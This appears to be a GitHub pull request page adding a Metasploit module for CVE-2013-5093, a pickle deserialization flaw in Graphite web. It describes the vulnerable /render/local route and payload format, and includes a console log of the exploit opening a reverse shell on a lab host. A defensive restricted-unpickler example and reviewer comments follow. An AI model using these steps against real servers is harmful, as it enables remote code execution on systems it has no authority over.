Adding module for CVE 2013-5093, Graphite Web Exploit #2260

Closed

@CharlieEriksen

Application

Graphite web: http://graphite.wikidot.com/

Versions affected: 0.9.5 up to and including 0.9.10

Installation guide: https://gist.github.com/jgeurts/3112065

Analysis

The vulnerability was introduced in: graphite-project/graphite-web@71d395e

Note that in webapp/web/render/views.py, which is a publicly accessible URL by default (I have found no way of restricting access), a pickle can be loaded. Pickles are unsafe as they can contain commands that will be executed.

The routing for the exploit goes as follows, as defined in webapp/web/render/views.py:

/render/local

The request to trigger it has to be formatted like:

[Chart type]

[Pickle]

Chart type, as an example, can be "line". This is then followed by a linebreak and then the pickle.

Usage

msf > use exploit/unix/webapp/graphite_pickle_exec 
msf exploit(graphite_pickle_exec) > show options

Module options (exploit/unix/webapp/graphite_pickle_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The path to a vulnerable application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(graphite_pickle_exec) > set RHOST 192.168.80.149
RHOST => 192.168.80.149
msf exploit(graphite_pickle_exec) > check
[*] The target appears to be vulnerable.
msf exploit(graphite_pickle_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 39Dm9uxcphKQ5GwX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "39Dm9uxcphKQ5GwX\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.80.129:4444 -> 192.168.80.149:57141) at 2013-08-07 19:14:59 -0400

whoami
www-data
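As an added example (not code from this PR, from the Metasploit module, or from graphite-web itself): the defensive counterpart to the bug described above. A restricted `pickle.Unpickler` subclass refuses every module/attribute lookup a pickle asks for unless it is on an explicit allowlist, so the data-only payloads a `/render/local` body legitimately carries still load while anything that names a class or function is rejected before it is resolved. The body format "[Chart type]\n[Pickle]" is taken from the description above; the allowlist, function names and sample bodies are hypothetical and constructed for this example.

```python
import io
import pickle
from collections import Counter


def split_render_body(body: bytes):
    """Split "<chart type>\\n<pickle>" on the FIRST newline only, so a pickle
    that itself contains newline bytes is handed over intact."""
    chart_type, sep, payload = body.partition(b"\n")
    if not sep:
        raise ValueError("body has no chart type / pickle separator")
    return chart_type.decode("ascii"), payload


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every GLOBAL/STACK_GLOBAL lookup not on an explicit allowlist.

    Plain containers and scalars (dict, list, tuple, str, int, float, None)
    never go through find_class, so a data-only payload loads normally; any
    pickle that references a module attribute is rejected before resolution.
    """

    def __init__(self, data: bytes, allowed=frozenset()):
        super().__init__(io.BytesIO(data))
        self.allowed = allowed  # hypothetical allowlist of (module, name) pairs

    def find_class(self, module, name):
        if (module, name) in self.allowed:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refused global {module}.{name}")


def safe_load_render_payload(body: bytes, allowed=frozenset()):
    chart_type, payload = split_render_body(body)
    data = RestrictedUnpickler(payload, allowed).load()
    if not isinstance(data, (dict, list)):
        raise pickle.UnpicklingError("render payload must be a dict or list")
    return chart_type, data


# Constructed sample bodies, not captured traffic.
BENIGN_BODY = b"line\n" + pickle.dumps({"target": [1.0, 2.5, 4.0]}, protocol=2)
# Counter is harmless, but it is serialised through a GLOBAL reference to
# collections.Counter, the same opcode path any class reference takes, so
# the restricted loader must refuse it.
NON_DATA_BODY = b"line\n" + pickle.dumps(Counter("aab"), protocol=2)


def demo():
    chart, data = safe_load_render_payload(BENIGN_BODY)
    try:
        safe_load_render_payload(NON_DATA_BODY)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    return chart, data, blocked


if __name__ == "__main__":
    print(demo())
```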
@jvazquez-r7

Processing...

@brandonprry

This is a really good example of this type of vulnerability! Thanks!

@jvazquez-r7

Just asking the author to repeat pr from a different branch than his master, as pointed on rapid7 wiki

https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment#wiki-pull

@coveralls

Changes Unknown when pulling 3053233 on CharlieEriksen:master into ** on rapid7:master.
